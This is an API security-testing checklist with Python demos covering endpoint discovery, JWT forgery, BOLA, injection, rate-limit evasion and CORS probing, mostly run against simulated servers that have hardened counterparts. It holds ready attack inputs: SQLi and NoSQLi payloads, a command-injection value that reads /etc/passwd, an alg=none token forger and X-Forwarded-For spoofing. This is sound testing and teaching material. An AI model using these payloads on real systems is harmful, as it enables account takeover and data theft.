1. Endpoint Enumeration & API Mapping
Start by collecting API documentation (Swagger/OpenAPI specs, Postman collections), pulling paths out of the JavaScript bundles the front end loads, and proxying normal use of the application to catch endpoints that are called but never documented. Then brute-force for the rest:
ffuf -u https://target.com/api/FUZZ -w wordlists/api.txt -mc all
-mc all shows every status code; once you know what the API returns for a route that does not exist, filter that response out with -fc or -fs so real hits stand out.
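The JavaScript step above is usually done by eye or with a grep. The script below is an added example (not part of the original checklist) that pulls quoted URLs and absolute paths out of a bundle and rewrites template placeholders as FUZZ so the output can be fed straight to ffuf. The bundle fragment is constructed for the demo and the regex is a deliberately simple heuristic; a real bundle will also contain prefix fragments such as "/api/v2" that you have to join to their relative parts by hand.

```python
import re

# Constructed sample of a front-end bundle (not taken from any real site).
SAMPLE_JS = """
const API="/api/v2";fetch(API+"/users/me",{credentials:"include"});
axios.post("/api/v2/orders",body);axios.get(`/api/v2/orders/${id}/refund`);
var legacy="https://legacy.example.com/internal/export?format=csv";
window.__cfg={graphql:"/graphql",admin:"/api/v2/admin/users"};
"""

# A quoted string that is either a full http(s) URL or an absolute path.
# The path branch accepts ${...} so template literals are captured too.
ENDPOINT_RE = re.compile(
    r"""["'`](?P<ep>https?://[^"'`\s]+|/[A-Za-z0-9_\-./${}?=&%]+)["'`]"""
)


def extract_endpoints(js_source):
    """Return sorted, de-duplicated endpoint candidates found in js_source.
    Template placeholders (${id}) become FUZZ so the list drops straight into ffuf."""
    found = set()
    for m in ENDPOINT_RE.finditer(js_source):
        found.add(re.sub(r"\$\{[^}]*\}", "FUZZ", m.group("ep")))
    return sorted(found)


if __name__ == "__main__":
    for ep in extract_endpoints(SAMPLE_JS):
        print(ep)
```

Run it over every script the proxy saw the browser load, not just the main bundle; lazily loaded chunks and third-party widgets are where the forgotten admin and export routes tend to live.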
2. Authentication Testing
Test for broken JWT validation (alg set to none, signature never checked, claims trusted after tampering), token reuse after logout or password change, acceptance of expired tokens, and weak OAuth flows (missing or unchecked state, loosely validated redirect_uri).
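Two of the JWT checks above (alg=none and expired-token acceptance) are easy to demonstrate end to end. The following is an added example, not code from the checklist or from any real library: it builds an HS256 token, forges an alg=none variant with an elevated role, and runs both through a verifier that trusts the header alg and never looks at exp, and a hardened verifier that pins the algorithm, always checks the MAC and enforces exp. SERVER_KEY is a hypothetical server secret that exists only so the server side can run offline; the tester's forging step does not use it.

```python
import base64
import hashlib
import hmac
import json
import time

# Assumption: the target's HMAC key. The tester never needs it; it is here only
# so the two server-side verifiers can run offline.
SERVER_KEY = b"hypothetical-server-secret"


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _json(obj):
    return json.dumps(obj, separators=(",", ":")).encode()


def sign_hs256(claims, key):
    """What the target's login endpoint does: issue a properly signed token."""
    head, body = b64url(_json({"alg": "HS256", "typ": "JWT"})), b64url(_json(claims))
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{b64url(sig)}"


def forge_alg_none(token, **new_claims):
    """Tester side: drop the signature, set alg=none, rewrite claims. No key needed."""
    _, body_b64, _ = token.split(".")
    claims = json.loads(b64url_decode(body_b64))
    claims.update(new_claims)
    head = b64url(_json({"alg": "none", "typ": "JWT"}))
    return f"{head}.{b64url(_json(claims))}."


def verify_vulnerable(token, key):
    """Honours whatever alg the token claims and never checks exp."""
    head_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(head_b64))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(body_b64))
    expected = hmac.new(key, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return json.loads(b64url_decode(body_b64))
    return None


def verify_hardened(token, key, now=None):
    """Pins alg server-side, always checks the MAC, and rejects missing or past exp."""
    head_b64, body_b64, sig_b64 = token.split(".")
    if json.loads(b64url_decode(head_b64)).get("alg") != "HS256":
        return None
    expected = hmac.new(key, f"{head_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    claims = json.loads(b64url_decode(body_b64))
    exp = claims.get("exp")
    if exp is None or (now if now is not None else time.time()) >= exp:
        return None
    return claims
```

Against a live target, paste the output of forge_alg_none into the Authorization header and watch for a 200 where a 401 is expected; also try the forged body with the original signature left in place, which catches servers that decode but never verify.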
3. BOLA (Broken Object Level Authorization)
Send a request for an object you own, then change only the object ID to one belonging to another account; use two test accounts so you can prove the returned data is someone else's:
GET /api/users/12345 → change to /api/users/12346
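The reliable way to confirm BOLA is a differential replay: fetch the object as its owner, fetch it again with a second account, and compare. The script below is an added example (not the checklist's own tooling) that does this against a constructed in-memory stand-in for the target, with a vulnerable handler and a hardened one side by side. The two tokens, user IDs and the `send` callable are assumptions; in a real engagement `send` wraps requests or httpx and returns status and body.

```python
import json
from dataclasses import dataclass


@dataclass
class Resp:
    status: int
    body: str


# Constructed stand-in for the target API (assumption, not real server code).
# Two test accounts: tok-A owns user 12345, tok-B owns user 12346.
USERS = {
    "12345": {"id": "12345", "email": "a@example.test", "ssn_last4": "1111"},
    "12346": {"id": "12346", "email": "b@example.test", "ssn_last4": "2222"},
}
TOKENS = {"tok-A": "12345", "tok-B": "12346"}


def api_vulnerable(method, url, token):
    uid = url.rsplit("/", 1)[-1]
    if token not in TOKENS:
        return Resp(401, "")
    if uid not in USERS:
        return Resp(404, "")
    return Resp(200, json.dumps(USERS[uid]))  # never asks who is calling


def api_hardened(method, url, token):
    uid = url.rsplit("/", 1)[-1]
    if token not in TOKENS:
        return Resp(401, "")
    if uid not in USERS or TOKENS[token] != uid:  # object-level check; 404 for both
        return Resp(404, "")                       # cases so IDs cannot be enumerated
    return Resp(200, json.dumps(USERS[uid]))


def bola_replay(send, method, url, owner_token, other_token):
    """Fetch an object as its owner, replay as a different user, compare.
    `send` is any callable (method, url, token) -> Resp."""
    base = send(method, url, owner_token)
    if base.status != 200:
        return "INCONCLUSIVE", f"owner request returned {base.status}"
    cross = send(method, url, other_token)
    if cross.status in (401, 403, 404):
        return "OK", f"cross-user request returned {cross.status}"
    if cross.status == 200 and cross.body == base.body:
        return "VULNERABLE", "identical object returned to a different principal"
    return "INCONCLUSIVE", f"cross-user request returned {cross.status} with a different body"


def sweep(send, url_template, ids, token, own_id):
    """Walk neighbouring IDs with one session; anything other than own_id that
    returns 200 is a lead to confirm with bola_replay and a second account."""
    return [
        i for i in ids
        if i != own_id and send("GET", url_template.format(id=i), token).status == 200
    ]
```

A 200 with a different body on the cross-user request is not automatically safe: some APIs return a redacted view to non-owners, so diff the two bodies before closing the finding.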
4. Injection Attacks
Deliver payloads in whichever body encoding the endpoint accepts (JSON, XML, or URL-encoded), since input filters are often applied to only one of them. Common attacks:
- SQLi:
{"query":"1 OR 1=1"}
- NoSQLi:
{"username": {"$gt": ""}}
- Command Injection:
cmd=ls; cat /etc/passwd
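The NoSQL payload above works because the server hands parsed JSON straight to the query layer, where {"$gt": ""} is an operator that matches any string rather than a literal value. The example below is added here (it is not from the checklist and does not use a real database driver): a constructed in-memory user table, a minimal filter evaluator that behaves like a document store for $gt and $ne, and a login handler in its vulnerable and type-checked forms.

```python
# Constructed users table and a minimal filter evaluator standing in for a document
# store's query engine (assumption; this is not MongoDB code).
USERS = [
    {"username": "admin", "password": "s3cret!"},
    {"username": "bob", "password": "hunter2"},
]


def matches(doc, flt):
    """Evaluate a filter the way a document DB would: plain values are equality
    tests, dicts are operator objects ($gt, $ne) applied to the stored value."""
    for field, cond in flt.items():
        val = doc.get(field)
        if isinstance(cond, dict):
            for op, arg in cond.items():
                if op == "$gt":
                    if not (isinstance(val, str) and val > arg):
                        return False
                elif op == "$ne":
                    if val == arg:
                        return False
                else:
                    raise ValueError(f"unsupported operator {op}")
        elif val != cond:
            return False
    return True


def login_vulnerable(body):
    """Parsed JSON goes straight into the filter, so operator objects are honoured."""
    flt = {"username": body.get("username"), "password": body.get("password")}
    return [u["username"] for u in USERS if matches(u, flt)]


def login_hardened(body):
    """Enforce the expected type before the value reaches the query layer."""
    user, pw = body.get("username"), body.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return []
    return [u["username"] for u in USERS if matches(u, {"username": user, "password": pw})]
```

The same bug appears with URL-encoded bodies when the framework expands username[$gt]= into a nested object, so send the operator in both encodings before concluding the endpoint is clean.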
5. Rate Limiting
Work out what the limit is keyed on (IP, token, account, user agent) and try to reset it by rotating that value: alternate tokens, spoof X-Forwarded-For, or vary the User-Agent. A limit keyed on a client-supplied header is no limit at all.
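To see why the choice of key matters, the added example below (not from the checklist) simulates a password-guessing run against a sliding-window limiter keyed first on X-Forwarded-For and then on the real peer address plus the targeted account. The peer address, header values and 5-per-minute limit are constructed for the demo.

```python
from collections import defaultdict


class SlidingWindowLimiter:
    """Allow at most `limit` requests per `window` seconds per key (constructed demo)."""

    def __init__(self, key_func, limit, window):
        self.key_func, self.limit, self.window = key_func, limit, window
        self.hits = defaultdict(list)

    def allow(self, req, now):
        key = self.key_func(req)
        recent = [t for t in self.hits[key] if now - t < self.window]
        if len(recent) >= self.limit:
            self.hits[key] = recent
            return False
        recent.append(now)
        self.hits[key] = recent
        return True


def key_by_xff(req):
    """Weak: trusts a client-supplied header, falling back to the socket address."""
    return req["headers"].get("X-Forwarded-For", req["peer"])


def key_by_peer_and_target(req):
    """Stronger: the socket address (or the rightmost trusted proxy hop) plus the
    account under attack, so neither header spoofing nor UA rotation resets it.
    A distributed attacker still needs a separate per-account limit on top."""
    return (req["peer"], req["body"]["username"])


def brute_force_login(limiter, attempts, rotate_xff):
    """Simulate guessing from one host; returns how many attempts got through."""
    allowed = 0
    for i in range(attempts):
        req = {
            "peer": "203.0.113.7",
            "headers": {"User-Agent": f"probe/{i}"},
            "body": {"username": "victim", "password": f"guess{i}"},
        }
        if rotate_xff:
            req["headers"]["X-Forwarded-For"] = f"198.51.100.{i % 250}"
        if limiter.allow(req, now=i * 0.05):  # 20 requests per second
            allowed += 1
    return allowed
```

When testing, send the same request twice with different X-Forwarded-For values after the limit has tripped; if the second one succeeds, the API is keying on a header you control.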
6. Security Misconfigurations
Look for verbose error messages, exposed stack traces, and CORS misconfigurations. Send an attacker-controlled Origin and check whether it is echoed back in Access-Control-Allow-Origin together with Access-Control-Allow-Credentials: true:
curl -i https://api.target.com/data -H "Origin: https://evil.com"
Repeat with a preflight (curl -X OPTIONS ... -H "Access-Control-Request-Method: PUT") for non-simple requests, and with Origin values such as null, https://api.target.com.evil.com and https://evilapi.target.com... to catch prefix and suffix matching bugs.
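Checking a handful of Origin values by hand is error-prone, so here is an added example (not the checklist's own code) that generates the usual probe origins, classifies each response, and runs them against two constructed server policies: a suffix match that was meant to allow subdomains, and an exact allowlist. The target host, allowlist entries and the `policy` callable are assumptions; in practice `policy` would be a function that sends the request and returns the response headers.

```python
def probe_origins(target_host):
    """Origins an attacker can control, or that a sloppy allowlist often admits."""
    return [
        "https://evil.example",                 # arbitrary third party
        f"https://{target_host}.evil.example",  # prefix-match bug
        f"https://evil{target_host}",           # suffix / endswith bug
        "null",                                 # sandboxed iframes, file:// pages
        f"http://{target_host}",                # scheme downgrade
    ]


def classify_cors(origin, headers):
    """Turn the response headers for one probe into a one-line verdict."""
    h = {k.lower(): v for k, v in headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no CORS headers"
    if acao == "*":
        return ("wildcard with credentials (invalid; browsers refuse)"
                if creds else "wildcard without credentials")
    if acao == origin:
        suffix = " with credentials" if creds else " without credentials"
        return ("null origin allowed" if origin == "null" else "origin reflected") + suffix
    return f"fixed allowlist: {acao}"


# Constructed server policies standing in for the target (assumptions, not real code).
def cors_policy_vulnerable(origin):
    # Meant to admit *.target.com; also admits https://eviltarget.com and http://
    if origin and origin.endswith("target.com"):
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true"}
    return {}


ALLOWED_ORIGINS = {"https://app.target.com", "https://admin.target.com"}


def cors_policy_hardened(origin):
    if origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true",
                "Vary": "Origin"}
    return {}


def assess(policy, target_host):
    """Run every probe through `policy` and return only the ones that were accepted."""
    results = {}
    for origin in probe_origins(target_host):
        verdict = classify_cors(origin, policy(origin))
        if verdict != "no CORS headers" and not verdict.startswith("fixed allowlist"):
            results[origin] = verdict
    return results
```

An origin reflected with credentials is the exploitable case: a page on that origin can read authenticated responses with the victim's cookies. Reflection without credentials only matters for data the API would otherwise hide behind an IP allowlist or similar.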
7. Business Logic Attacks
Manipulate the workflow rather than the inputs: submit the same refund twice (including concurrently), tamper with prices or quantities in the order request, or jump straight to the order-complete step and skip payment.
8. Final Reporting
Document vulnerabilities with:
- Request/response pairs
- Impact and exploitation method
- Remediation recommendations
Pro tip: Use Burp Suite with extensions like JWT Editor, Autorize (automated authorization checks by replaying your requests with a second user's session), and InQL for GraphQL support.